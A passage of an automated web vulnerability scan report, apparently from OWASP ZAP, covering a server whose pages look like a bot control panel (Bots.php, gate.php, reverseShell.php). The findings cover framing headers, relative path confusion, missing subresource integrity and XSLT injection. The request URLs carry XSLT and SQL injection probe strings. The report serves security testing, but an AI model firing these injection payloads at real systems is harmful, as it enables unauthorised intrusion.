| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 28 |
| Solution |
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.
If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
|
| Reference | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options |
| Tags |
OWASP_2021_A05
WSTG-v42-CLNT-09 OWASP_2017_A06 |
| CWE Id | 1021 |
| WASC Id | 15 |
| Plugin Id | 10020 |
|
Medium |
Relative Path Confusion |
|---|---|
| Description |
The web server is configured to serve responses to ambiguous URLs in a manner that is likely to lead to confusion about the correct "relative path" for the URL. Resources (CSS, images, etc.) are also specified in the page response using relative, rather than absolute URLs. In an attack, if the web browser parses the "cross-content" response in a permissive manner, or can be tricked into permissively parsing the "cross-content" response, using techniques such as framing, then the web browser may be fooled into interpreting HTML as CSS (or other content types), leading to an XSS vulnerability.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Evidence | <img src="Capture.PNG" alt="Logo"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 1 |
| Solution |
Web servers and frameworks should be updated to be configured to not serve responses to ambiguous URLs in such a way that the relative path of such URLs could be mis-interpreted by components on either the client side, or server side.
Within the application, the correct use of the "<base>" HTML tag in the HTTP response will unambiguously specify the base URL for all relative URLs in the document.
Use the "Content-Type" HTTP response header to make it harder for the attacker to force the web browser to mis-interpret the content type of the response.
Use the "X-Content-Type-Options: nosniff" HTTP response header to prevent the web browser from "sniffing" the content type of the response.
Use a modern DOCTYPE such as "<!doctype html>" to prevent the page from being rendered in the web browser using "Quirks Mode", since this results in the content type being ignored by the web browser.
Specify the "X-Frame-Options" HTTP response header to prevent Quirks Mode from being enabled in the web browser using framing attacks.
|
| Reference |
https://arxiv.org/abs/1811.00917
https://hsivonen.fi/doctype/ https://www.w3schools.com/tags/tag_base.asp |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 20 |
| WASC Id | 20 |
| Plugin Id | 10051 |
|
Medium |
Sub Resource Integrity Attribute Missing |
|---|---|
| Description |
The integrity attribute is missing on a script or link tag served by an external server. The integrity tag prevents an attacker who have gained access to this server from injecting a malicious content.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 95 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 31 |
| Solution |
Provide a valid integrity attribute to the tag.
|
| Reference | https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 345 |
| WASC Id | 15 |
| Plugin Id | 90003 |
|
Medium |
XSLT Injection |
|---|---|
| Description |
Injection using XSL transformations may be possible, and may allow an attacker to read system information, read and write files, or execute arbitrary code.
|
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Bots.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 748 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/dashboard.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 857 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/gate.php?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 659 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 271 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 277 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%20OR%201=1 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 288 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20-- |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--%20/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 494 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 397 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 293 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 489 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 799 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 714 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 509 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 754 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 278 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 511 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 284 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%20OR%201=1 |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 295 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20-- |
| Method | GET |
| Parameter | login.php |
